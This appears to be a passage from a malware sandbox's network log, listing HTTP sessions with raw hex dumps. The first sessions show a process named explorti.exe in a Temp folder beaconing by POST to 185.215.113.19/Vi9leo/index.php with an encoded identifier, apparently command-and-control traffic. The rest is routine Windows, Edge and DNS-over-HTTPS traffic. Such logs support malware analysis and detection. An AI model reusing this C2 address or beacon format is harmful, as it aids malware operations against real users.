Sep 1, 2024 06:30:29.438462973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.5	49904	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:29.492850065 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:30.235769033 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.5	49905	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:30.362751961 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:31.146542072 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:11 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BtOHSlhmZvxL8lL&MD=NHFb+y1s HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-01 04:28:11 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 66ccc353-6c78-444f-908b-f09fa15f269d MS-RequestId: 1d11df95-5719-4152-8548-aa2a6b2d31cd MS-CV: oHZBxpvXdUi4O242.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 01 Sep 2024 04:28:10 GMT Connection: close Content-Length: 24490
2024-09-01 04:28:11 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-09-01 04:28:11 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49740	13.107.246.60	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:19 UTC	486	OUT	GET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: ArbitrationService Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-01 04:28:19 UTC	559	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 04:28:19 GMT Content-Type: application/octet-stream Content-Length: 11989 Connection: close Last-Modified: Fri, 23 Aug 2024 00:10:35 GMT ETag: 0x8DCC30802EF150E x-ms-request-id: 903262f1-801e-001b-4826-f94695000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240901T042819Z-16579567576kv75wmks9m65qec00000005y000000000k48k Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-09-01 04:28:19 UTC	11989	IN	Data Raw: 7b 0d 0a 20 20 22 63 6f 6e 66 69 67 56 65 72 73 69 6f 6e 22 3a 20 33 32 2c 0d 0a 20 20 22 50 72 69 76 69 6c 65 67 65 64 45 78 70 65 72 69 65 6e 63 65 73 22 3a 20 5b 0d 0a 20 20 20 20 22 53 68 6f 72 65 6c 69 6e 65 50 72 69 76 69 6c 65 67 65 64 45 78 70 65 72 69 65 6e 63 65 49 44 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 43 4f 55 50 4f 4e 53 5f 43 48 45 43 4b 4f 55 54 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 4c 4f 57 45 52 5f 50 52 49 43 45 5f 46 4f 55 4e 44 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 42 49 4e 47 5f 53 45 41 52 43 48 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 52 45 42 41 54 45 Data Ascii: { "configVersion": 32, "PrivilegedExperiences": [ "ShorelinePrivilegedExperienceID", "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT", "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND", "SHOPPING_AUTO_SHOW_BING_SEARCH", "SHOPPING_AUTO_SHOW_REBATE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49741	13.107.246.60	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:19 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.47 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-01 04:28:19 UTC	583	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 04:28:19 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Fri, 02 Aug 2024 18:10:35 GMT ETag: 0x8DCB31E67C22927 x-ms-request-id: 66f87118-601e-001a-2116-f94768000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240901T042819Z-16579567576rhxz5kgqdm3tfq000000006000000000060uv Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-09-01 04:28:19 UTC	15801	IN	Data Raw: 1f 8b 08 08 1a 21 ad 66 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: !fasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-09-01 04:28:19 UTC	16384	IN	Data Raw: 4a b0 09 cb 82 45 ac c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 Data Ascii: JEqb,0Rte\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1
2024-09-01 04:28:19 UTC	16384	IN	Data Raw: 2f 4d 35 19 b9 3f d5 c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 Data Ascii: /M5?Rg\|M kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|c
2024-09-01 04:28:19 UTC	16384	IN	Data Raw: 99 dc 5a 2e 69 cf 52 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 Data Ascii: Z.iRAHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`
2024-09-01 04:28:19 UTC	5254	IN	Data Raw: 29 50 5f 50 34 9a d3 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 Data Ascii: )P_P4*'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49742	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:20 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-01 04:28:20 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF70) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=217040 Date: Sun, 01 Sep 2024 04:28:20 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49747	172.64.41.3	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:20 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-09-01 04:28:20 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-09-01 04:28:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 01 Sep 2024 04:28:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8bc28353ee9e7287-EWR alt-svc: h3=":443"; ma=86400
2024-09-01 04:28:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 12 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomA)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49748	172.64.41.3	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:20 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-09-01 04:28:20 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-09-01 04:28:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 01 Sep 2024 04:28:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8bc283540dd18c15-EWR alt-svc: h3=":443"; ma=86400
2024-09-01 04:28:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 16 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomA)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49746	162.159.61.3	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:20 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-09-01 04:28:20 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-09-01 04:28:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 01 Sep 2024 04:28:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8bc283541d8643e7-EWR alt-svc: h3=":443"; ma=86400
2024-09-01 04:28:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom#)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49745	162.159.61.3	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:20 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-09-01 04:28:20 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-09-01 04:28:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 01 Sep 2024 04:28:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8bc28353f96643ab-EWR alt-svc: h3=":443"; ma=86400
